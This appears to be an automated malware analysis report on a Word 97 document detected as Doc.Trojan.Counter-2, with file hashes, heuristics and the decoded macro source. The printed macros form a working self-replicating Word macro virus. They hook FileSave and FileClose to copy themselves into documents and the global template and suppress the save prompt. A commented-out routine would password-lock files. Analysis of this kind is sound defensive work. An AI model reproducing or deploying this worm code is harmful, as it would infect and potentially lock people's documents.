Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3e47d4514d352fde…

MALICIOUS

Office (OLE)

50.0 KB Created: 2000-01-07 18:11:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 29f9f59addc5234656bd3d2dd285fea4 SHA-1: d2967fa26e5ae2a66bab87f09e38fa1fedcf8850 SHA-256: 3e47d4514d352fde733b0053ae6bb598044a7f60b1f8da30c3fef6cfb43a8683
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file contains legacy WordBasic macro markers and VBA macros, indicating it is designed to infect other documents. The ClamAV detection 'Doc.Trojan.Counter-2' strongly suggests malicious intent. The macro code attempts to copy itself to other documents and save them, consistent with a macro-based worm.

Heuristics 3

  • ClamAV: Doc.Trojan.Counter-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Counter-2
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5701 bytes
SHA-256: 39b04e4b535e05e48562c10dbf7c67be4f289dbc338ab8e3bbf5d780e4f303ba
Detection
ClamAV: Doc.Trojan.Counter-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "FileSave"

Public Sub MAIN()
Dim DestFile$
Dim MacroFile$
Dim Test
Dim Text_$
Dim Number
Dim Space_$

' ----------------------------
' | Written by Guy Incognito |
' |     Bedford, England     |
' |       on 26/09/97        |
' ----------------------------

On Error Resume Next

DestFile$ = WordBasic.[SelectionFileName$]()
MacroFile$ = WordBasic.[MacroFileName$]()

WordBasic.ToolsOptionsSave GlobalDotPrompt:=0

If MacroFile$ = DestFile$ Then GoTo InfectGlobal

InfectDoc:
If WordBasic.[FileNameInfo$](DestFile$, 3) = "" Then GoTo NoInfect

Test = InStr(DestFile$, ".DOC")
If Test = 0 Then GoTo NoInfect

Text_$ = WordBasic.[MacroDesc$]("Generation")
If Len(Text_$) > 14 Then Text_$ = "0"
Number = WordBasic.Val(Text_$) + 1
Space_$ = Str(Number)
Text_$ = WordBasic.[LTrim$](Space_$)
WordBasic.ToolsMacro Name:="Generation", Description:=Text_$, SetDesc:=1

WordBasic.MacroCopy "FileClose", DestFile$ + ":FileClose"
WordBasic.MacroCopy "FileSave", DestFile$ + ":FileSave"
WordBasic.MacroCopy "ToolsMacro", DestFile$ + ":ToolsMacro"
WordBasic.MacroCopy "FileTemplates", DestFile$ + ":FileTemplates"
WordBasic.MacroCopy "FileExit0", DestFile$ + ":FileExit"
WordBasic.MacroCopy "Generation", DestFile$ + ":Generation"

Rem But all I wanna do is reproduce, man!

Rem If Second(Now()) <> 30 Then Goto NoEncrypt
Rem Key$ = GetSystemInfo$(26)
Rem FileSaveAs .Name = DestFile$, .Format = 1, .Password = Key$
Rem Goto Exit

NoEncrypt:
WordBasic.FileSaveAs Name:=DestFile$, Format:=1
GoTo Exit_

InfectGlobal:

Text_$ = WordBasic.[MacroDesc$]("Generation")
If Len(Text_$) > 14 Then Text_$ = "0"
Number = WordBasic.Val(Text_$) + 1
Space_$ = Str(Number)
Text_$ = WordBasic.[LTrim$](Space_$)
WordBasic.ToolsMacro Name:="Generation", Description:=Text_$, SetDesc:=1

WordBasic.MacroCopy DestFile$ + ":FileClose", "FileClose"
WordBasic.MacroCopy DestFile$ + ":FileSave", "FileSave"
WordBasic.MacroCopy DestFile$ + ":ToolsMacro", "ToolsMacro"
WordBasic.MacroCopy DestFile$ + ":FileTemplates", "FileTemplates"
WordBasic.MacroCopy DestFile$ + ":FileExit", "FileExit0"
WordBasic.MacroCopy DestFile$ + ":Generation", "Generation"

NoInfect:
WordBasic.FileSave

Exit_:

End Sub

Attribute VB_Name = "ToolsMacro"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Runs, creates, deletes, or revises a macro"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.ToolsMacro.MAIN"

Rem You didn't say the magic word.

End Sub

Attribute VB_Name = "FileTemplates"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Changes the active template and the template options"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileTemplates.MAIN"

Rem Not in thledentitl

Attribute VB_Name = "FileClose"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Saves the active document or template"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileClose.MAIN"
Dim DestFile$
Dim MacroFile$
Dim Test
Dim Text_$
Dim Number
Dim Space_$

' ----------------------------
' | Written by Guy Incognito |
' |     Bedford, England     |
' |       on 26/09/97        |
' ----------------------------

On Error Resume Next

DestFile$ = WordBasic.[SelectionFileName$]()
MacroFile$ = WordBasic.[MacroFileName$]()

WordBasic.ToolsOptionsSave GlobalDotPrompt:=0

If MacroFile$ = DestFile$ Then GoTo InfectGlobal

InfectDoc:
If WordBasic.[FileNameInfo$](DestFile$, 3) = "" Then GoTo NoInfect

Test = InStr(DestFile$, ".DOC")
If Test = 0 Then GoTo NoInfect

Text_$ = WordBasic.[MacroDesc$]("Generation")
If Len(Text_$) > 14 Then Text_$ = "0"
Number = WordBasic.Val(Text_$) + 1
Space_$ = Str(Number)
Text_$ = WordBasic.[LTrim$](Space_$)
WordBasic.ToolsMacro Name:="Generation", Description:=Tex
... (truncated)